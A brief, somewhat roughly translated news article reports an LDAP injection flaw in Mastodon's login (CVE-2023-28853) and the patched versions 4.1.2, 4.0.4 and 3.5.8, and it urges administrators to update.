The social network Mastodon is based on the software for servers of the same name. Attackers could have read individual pieces of information from it due to inadequate filtering of the data transferred during LDAP authentication.
In the The discoverers write a safety report the vulnerability that the user name is not filtered and an LDAP database query can be smuggled in. Bit by bit, information about users could be read out. The proof-of-concept description shows that it was not possible to obtain password hashes (CVE-2023-28853, CVSS 7.7Risk “hoch“).
Mastodon: Any user attributes can be viewed from the LDAP database
The discoverers therefore also describe the gap as an LDAP injection vulnerability when logging in. It makes any user attributes from the LDAP database accessible to attackers.
Mastodon versions from 2.5.0 are affected. The developers have closed the security gaps in versions 4.1.2, 4.0.4 and 3.5.8.
Die Release notes for the three new Mastodon versions mention the vulnerability and also provide Ruby version 3.0.6 as a security update. Previous versions contained a ReDoS vulnerability. Administrators of a Mastodon instance should install the updated versions as soon as possible, as the developers classify the vulnerability that has been closed as high-risk.
A few weeks ago it became known that a configuration error in Mastodon led to a data leak. However, it was a matter of “human error”: In the course of the expansion of hardware and software at Mastodon, an archive server was visible to all users for several weeks.
(dmk)
